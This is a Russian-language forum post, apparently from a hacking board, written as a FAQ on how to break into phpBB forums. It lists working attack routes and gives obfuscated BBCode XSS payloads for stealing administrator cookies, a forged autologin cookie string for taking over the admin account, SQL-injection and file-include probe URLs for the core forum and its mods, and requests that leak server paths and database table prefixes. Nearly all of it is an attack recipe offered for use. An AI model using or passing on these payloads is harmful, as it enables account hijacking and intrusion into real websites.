В этой теме нет ответов

[Admin]

1) Хочу понять, как же взламываются форумы phpbb.

 

Их можно взломать 5 способами:

1) Через уязвимость highlight. Дает исполнение команд на сервере. Подробно о баге можно почитать в разделе "Заливка шелла в phpbb"

2) Получить доступ к аккаунту администратора.

3) Через уязвимость в профайле signature_bbcode_uid Подробно о баге можно почитать в разделе "Заливка шелла в phpbb"

4) Взлом через моды.

5) Взлом через sql инъекцию.

2) Как получить аккаунт администратора на форуме?

 

1) Угадать, украсть, спросить.

2) XSS - позволяет украсть куки администратора и под ним зайти на форум. В версиях >2.0.19 нельзя войти в админку незная пароля.

xss для форума phpbb. Почти все найдены White Jordan.

[c*olor*=#EFE*FEF][forbidden link][/UR*L]  phpbb 2.0.17 Рушиться структура, код надо доработать[im*g]http://ww*w.phpbb.com/xx[em*ail]xx@*xx.com[/ema*il]images/p*hplogo.gif[/i*mg] [*url]ww*w.ut[forbidden link][/u*rl]' [*url=http://www.%*5burl=http://xx.com/style=display:no*ne;backgrou*nd#58;url(javascript: alert()&+#41; %5*dxx*]http://www.<a href="http://xx.com/style=displa...) " target="_*blank*">xx[/url]

 

пихаем все эти коды в сообщение, на сниффере ловим куки, подставляем их, и мы админы.

 

3) Получение админского аккаунта через багу в куках.

phpbbmysql_data:a%3A2%3A%7Bs%3A11%3A%22autologinid %22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222% 22%3B%7D

 

И мы становимся админом (если форум не пропатчен).

3) Как происходит взлом?

1) Просмотр версии форума. Она определяется заходом по ссылке http://site.ru/forum.../CHANGELOG.html

Смотрим какая там последняя версия и прибавляем единицу.

2) Проверку на уязвимость форума к багам highlight, админским кукам, signature_bbcode_uid.

Если сработало, иди в раздел "Заливка шелла в phpbb". Если не сработало.

3) Проверяем форум на sql уязвимости.

Делаем запросы:

http://site.ru/forum...=1&topic_id=-1'

http://site.ru/forum...p?search_id=-1'

http://site.ru/forum...rch_results=-1'

Если сработало, то добываем хеш админа, расшифровываем.

4) Если ничего не помогло, теперь надо проверить форум на дырки в модах.

запросы:

http://site.ru/forum...ng_activity.php include

http://site.ru/forum...in/addentry.php include

http://site.ru/forum...2f_phpbb204.php include

http://site.ru/forum...ion_logging.php include

http://site.ru/forum..._view_month.php sql

http://site.ru/forum..._offer_view.php sql

http://site.ru/forum/downloads.php sql

http://site.ru/forum/alltopics.php sql

http://site.ru/forum.../admin_cash.php include

http://site.ru/forum/toplist.php sql

http://site.ru/forum/index.php?s=-1' sql

http://site.ru/forum...ex.php?style=-1' sql

Запросы для получение привилегий найдете на секьюрити порталах.

5) Взлом через xss.

 

4) Как узнать серверный путь форума?

http://site.ru/forum...p?setmodules=00 до 2.0.19

http://site.ru/forum...ile.php?mode[]=

http://site.ru/forum...ing.php?mode[]=

http://site.ru/forum...pcp.php?mode[]=

http://site.ru/forum/modcp.php?mode[]=

http://site.ru/forum...g.php?folder[]=

http://site.ru/forum/db/oracle.php

http://site.ru/forum...erlist.php?mode[]=cx + дает возможно узнать префикс таблиц базы данных

 

Пути для форумов <2.0.10

http://site.ru/forum...egory_rows=aaaa

http://site.ru/forum/faq.php?faq=aaaa

http://site.ru/forum...2&ranksrow=aaaa

5) Как узнать префикс таблиц базы данных?

http://site.ru/forum...t.php?mode[]=cx

http://site.ru/forum/modcp.php?t=-456